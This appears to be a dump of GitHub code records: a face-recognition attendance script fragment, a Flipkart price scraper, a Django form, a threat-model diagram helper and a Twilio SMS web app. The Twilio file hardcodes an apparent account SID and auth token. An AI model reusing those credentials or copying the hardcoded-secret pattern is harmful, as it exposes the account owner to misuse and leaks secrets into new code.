255), 2)\n color = (25, (100-conf)*(255/100), 0)\n \n if (100-conf) > 70:\n cv2.putText(img, str(confstr), (x + 5, y + h - 5), font,1, (0, 255, 0),1 )\n elif (100-conf) > 50:\n \n cv2.putText(img, str(confstr), (x + 5, y + h - 5), font, 1, (0, 255, 255), 1)\n else:\n cv2.putText(img, \"unknown\", (x + 5, y + h - 5), font, 1, (0, 0, 255), 1)\n \n if attended:\n break\n\n\n\n cv2.imshow('Attendance', img)\n if attended:\n break\n if (cv2.waitKey(1) == ord('q')):\n break\n \n cam.release()\n cv2.destroyAllWindows()\n\n\n","repo_name":"FathanAkram-app/AbsensiFaceRecognitionService","sub_path":"python/OpenCVMethod/Recognize.py","file_name":"Recognize.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8828462500","text":"from selenium import webdriver\r\ndriver = webdriver. Chrome('C:/Users/User/Downloads/chromedriver.exe')\r\ndriver.get(\"https://www.flipkart.com\")\r\ndriver.maximize_window()\r\n#Close the pop-up\r\ndriver.find_element_by_xpath(\"/html/body/div[2]/div/div/button\").click()\r\n#searching for iphones\r\nsearch = driver.find_element_by_xpath(\"//body/div[@id='container']\"\r\n \"/div[1]/div[1]/div[1]/div[2]/div[2]/form[1]/div[1]/div[1]/input[1]\")\r\nsearch.send_keys('iPhone')\r\n#clicking enter\r\nsearch.submit()\r\n\r\n#CSV file\r\nfrom selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\nprices=[] #List to store price of the product\r\ndriver.get(\"https://www.flipkart.com/\"\r\n \"search?q=iPhone&otracker=search&otracker1=search&marketplace=FLIPKART&as-show=on&as=off\")\r\ncontent = driver.page_source\r\nsoup = BeautifulSoup(content)\r\nfor a in soup.findAll('a',href=True, attrs={'class':'_2ZdXDB'}):\r\n price=a.find('div', attrs={'class':'_3xFhiH'})\r\n prices.append(price.text)\r\n\r\ndf = pd.DataFrame({'Price':prices})\r\ndf.to_csv('products.csv', index=False, encoding='utf-8')\r\n\r\n","repo_name":"Sanjana1621/FlipKartProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16809832532","text":"\"\"\"\nForm for creating a language object\n\"\"\"\nfrom django import forms\n\nfrom ...models import Language\n\n\nclass LanguageForm(forms.ModelForm):\n \"\"\"\n DjangoForm Class, that can be rendered to create deliverable HTML\n\n Args:\n forms : Defines the form as an Model form related to a database object\n \"\"\"\n\n class Meta:\n model = Language\n fields = [\n 'code',\n 'english_name',\n 'native_name',\n 'text_direction',\n ]\n","repo_name":"digitalfabrik/coldaid-backend","sub_path":"src/cms/forms/languages/language_form.py","file_name":"language_form.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"71535490680","text":"from typing import List, Tuple\n\nfrom otm.otm.entity.component import Component\nfrom otm.otm.entity.otm import OTM\nfrom otm.otm.entity.representation import RepresentationElement\nfrom otm.otm.entity.trustzone import Trustzone\nfrom otm.otm.util.representation import build_size, build_position, make_relative\n\nTZ_PADDING = 30\n\n\ndef _get_trustzone_components(trustzone_id: str, components: List[Component]):\n return list(filter(lambda component: component.parent == trustzone_id, components))\n\n\ndef _get_first_representation(component: Component):\n return component.representations[0] if component.representations and len(component.representations) > 0 else None\n\n\ndef calculate_missing_trustzones_representations(otm: OTM, representation_id):\n for trustzone in otm.trustzones:\n if not trustzone.representations:\n tz_components = _get_trustzone_components(trustzone.id, otm.components)\n TrustZoneRepresentationCalculator(representation_id, trustzone, tz_components).calculate()\n\n\nclass TrustZoneRepresentationCalculator:\n def __init__(self, representation_id: str, trustzone: Trustzone, trustzone_components: List[Component]):\n self.representation_id = representation_id\n self.trustzone = trustzone\n self.components = trustzone_components\n\n self.component_representations = list(filter(lambda r: r, map(_get_first_representation, trustzone_components)))\n\n def calculate(self):\n if self.component_representations:\n self.trustzone.representations = [self.__calculate_trustzone_representation_by_components()]\n self.__make_components_representations_relative()\n\n def __calculate_trustzone_representation_by_components(self):\n left_x, right_x, top_y, bottom_y = self.__calculate_trustzone_limits_by_components()\n\n return RepresentationElement(\n id_=f'{self.trustzone.id}-representation',\n name=f'{self.trustzone.name} Representation',\n representation=self.representation_id,\n position=build_position(left_x, top_y, TZ_PADDING),\n size=build_size(left_x, right_x, top_y, bottom_y, TZ_PADDING)\n )\n\n def __calculate_trustzone_limits_by_components(self) -> Tuple:\n \"\"\"\n Calculate the trustzone representation by the position of its children components.\n The coordinates x, y starts as 0,0 in the top left corner of the diagram\n \"\"\"\n left_x, right_x, top_y, bottom_y = (None,) * 4\n\n for representation in self.component_representations:\n x, y = representation.position['x'], representation.position['y']\n width, height = representation.size['width'], representation.size['height']\n\n if not left_x or x < left_x:\n left_x = x\n if not right_x or right_x < (x + width):\n right_x = (x + width)\n\n if not top_y or y < top_y:\n top_y = y\n if not bottom_y or bottom_y < (y + height):\n bottom_y = (y + height)\n\n return left_x, right_x, top_y, bottom_y\n\n def __make_components_representations_relative(self):\n tz_position = self.trustzone.representations[0].position\n for component in self.components:\n make_relative(_get_first_representation(component), tz_position)\n","repo_name":"iriusrisk/startleft","sub_path":"slp_visio/slp_visio/parse/representation/trustzone_representation_calculator.py","file_name":"trustzone_representation_calculator.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"36350815671","text":"import os\n\nfrom twilio.rest import TwilioRestClient\n\nimport jinja2\nimport webapp2\n \n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'])\n\n\naccount = \"ACb25ca21f061784336f896f03dc8d5bc0\"\ntoken = \"ec3c8c702590b4b63c2592817c378540\"\nclient = TwilioRestClient(account, token)\n\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('homelayout.html')\n self.response.write(template.render())\n\n def post(self):\n msg_body = \"Thinking of You\"\n trim_typed_msg = self.request.get('message').lstrip()\n if len(trim_typed_msg) > 0:\n msg_body = trim_typed_msg\n send_to_num = self.request.get('number')\n template = JINJA_ENVIRONMENT.get_template('sentlayout.html')\n if len(send_to_num) == 10:\n message = client.sms.messages.create(to=\"+1\" + send_to_num, from_=\"+12487825626\",\n body=msg_body)\n message = 'Message sent!'\n template_values = {\n 'message_line1': message,\n 'message_line2': \"\"\n }\n self.response.write(template.render(template_values))\n else:\n message_line1 = \"Invalid phone number.\"\n message_line2 = \"Please try again!\"\n template_values = {\n 'message_line1': message_line1,\n 'message_line2': message_line2\n }\n self.response.write(template.render(template_values))\n \n \nclass Funnel2(webapp2.RequestHandler):\n def post(self):\n template = JINJA_ENVIRONMENT.get_template('funnel2.html')\n self.response.write(template.render())\n \n \nclass Funnel3(webapp2.RequestHandler):\n def post(self):\n template = JINJA_ENVIRONMENT.get_template('funnel3.html')\n self.response.write(template.render())\n\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/funnel2', Funnel2),\n ('/funnel3', Funnel3),\n], debug=True)\n\n\n\n\n\n\n\n","repo_name":"aperskystern/thinking-of-you","sub_path":"think.py","file_name":"think.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}